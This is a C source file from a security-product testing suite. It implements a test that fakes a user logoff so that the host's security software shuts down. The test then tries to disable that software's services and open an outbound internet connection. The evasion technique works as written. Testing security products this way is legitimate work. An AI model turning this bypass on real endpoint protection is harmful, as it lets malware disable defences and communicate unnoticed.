/*

 Security Software Testing Suite - SSS (general bypassing test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Credits:

   * Based on the idea and code of System Shutdown Simulator, written by Denis Sazonov, http://zeroday-software.110mb.com/.


 Method description:

   * Use ExitWindowsEx API to log off the current user but treat WM_QUERYENDSESSION message not to terminate our test.

   * Assuming that the security software behaves correctly and terminates their user components when the user logged off,
     wait a few seconds and attempt to perform an otherwise privileged action.

   * The implementation of this test assumes that the following actions are privileged:

        (a) An outbound connection attempt.
        (b) Manipulating services and drivers of the security software.

*/


#include <stdio.h>
#include <windows.h>
#include "include/common.h"
#include "include/common-leak.h"
#include "include/common-hook.h"


// names of the test's class and window
#define SSS_CLASS_NAME          "ssts_sss_class"
#define SSS_WINDOW_NAME         "ssts_sss_window"

// missing define - shutdown reason
#define SHTDN_REASON_MINOR_MAINTENANCE  0x00000001


// handle to the test's window
// a handle to the test's window
HWND window=NULL;

// signal event - is set when WM_ENDSESSION message is received
HANDLE signal=NULL;


/*
 Callback routine for the test's window that returns FALSE for WM_QUERYENDSESSION and WM_ENDSESSION messages.
 For more information see 'lpfnWndProc' item of WNDCLASSEX structure.
*/

LRESULT CALLBACK WindowProc(HWND hwnd,UINT uMsg,WPARAM wParam,LPARAM lParam)
{
  if (uMsg==WM_ENDSESSION) SetEvent(signal);
  return (uMsg==WM_QUERYENDSESSION) ? FALSE : DefWindowProc(hwnd,uMsg,wParam,lParam);
}


int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
  int res=FALSE;

  MessageBox(NULL,"The output of this test will be redirected to \"sss.txt\".\n","Security Software Testing Suite - SSS",MB_OK);

  COM_CONF conf;
  if (!com_console_init_winmain_gui("SSS","sss",lpCmdLine,&conf,COM_TEST_TYPE_SSS)) return 1;

  char *used_dlls[]={"user32.dll","wininet.dll"};
  if (!com_hook_load_libraries(used_dlls,2)) return 1;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;

  WNDCLASSEX wndclass;
  memset(&wndclass,0,sizeof(wndclass));
  wndclass.cbSize=sizeof(wndclass);
  wndclass.style=CS_GLOBALCLASS;
  wndclass.lpfnWndProc=WindowProc;
  wndclass.hInstance=hInstance;
  wndclass.lpszClassName=SSS_CLASS_NAME;

  if (!SetProcessShutdownParameters(0,0)) fprintf(conerr,"Unable to set process shutdown parameters.\n");

  signal=CreateEvent(NULL,FALSE,FALSE,NULL);
  if (signal)
  {
    ATOM class=RegisterClassEx(&wndclass);
    if (class)
    {
      window=CreateWindowEx(WS_EX_APPWINDOW,SSS_CLASS_NAME,SSS_WINDOW_NAME,0,0,0,100,100,NULL,NULL,NULL,NULL);
      if (window)
      {
        if (com_verbosity_get()) fprintf(conout,"The main window of the test created.\n");

        if (com_verbosity_get()) fprintf(conout,"Message loop thread created.\n");

        if (ExitWindowsEx(EWX_LOGOFF,SHTDN_REASON_MINOR_MAINTENANCE))
        {
          if (com_verbosity_get()) fprintf(conout,"The system shutdown initiated.\n");

          for (;;)
          {
            MSG msg;
            while (PeekMessage(&msg,window,0,0,PM_REMOVE))
            {
              TranslateMessage(&msg);
              DispatchMessage(&msg);
            }

            if (WaitForSingleObject(signal,50)==WAIT_OBJECT_0)
            {
              if (com_verbosity_get()) fprintf(conout,"Signal received.\n\n");
              break;
            }
          }

          // and give security software a chance to terminate
          Sleep(10000);

          for (int i=0;i<conf.services_cnt;i++)
          {
            if (com_service_disable(conf.services[i],&err_inf))
            {
              fprintf(conout,"Service \"%s\" disabled.\n",conf.services[i]);
              res=TRUE;
            } else com_err_print_clear(&err_inf,COM_ERR_STANDARD_PREFIX);
          }

          fprintf(conout,"\n");

          char buffer[4096];
          if (com_attempt_wininet(buffer,sizeof(buffer),&conf,&err_inf)
           && com_find_pattern_and_print_data(buffer,sizeof(buffer),&conf,&err_inf))
          {
            res=TRUE;
          } else com_err_print_clear(&err_inf,COM_ERR_STANDARD_PREFIX);

          err_inf.occurred=FALSE;

          ExitWindowsEx(EWX_LOGOFF,SHTDN_REASON_MINOR_MAINTENANCE);
        } else com_err_set(&err_inf,"Unable to initiate the system shutdown.\n");

        // We can not call DestroyWindow because we have to close the output stream before.
//        DestroyWindow(window);
      } else com_err_set(&err_inf,"Unable to create window \"%s\", class \"%s\".\n",SSS_WINDOW_NAME,SSS_CLASS_NAME);

      UnregisterClass(SSS_CLASS_NAME,hInstance);
    } else com_err_set(&err_inf,"Unable to register class \"%s\".\n",SSS_CLASS_NAME);
  } else com_err_set(&err_inf,"Unable to create event.\n");

  return com_end(res,&err_inf,&conf);
}
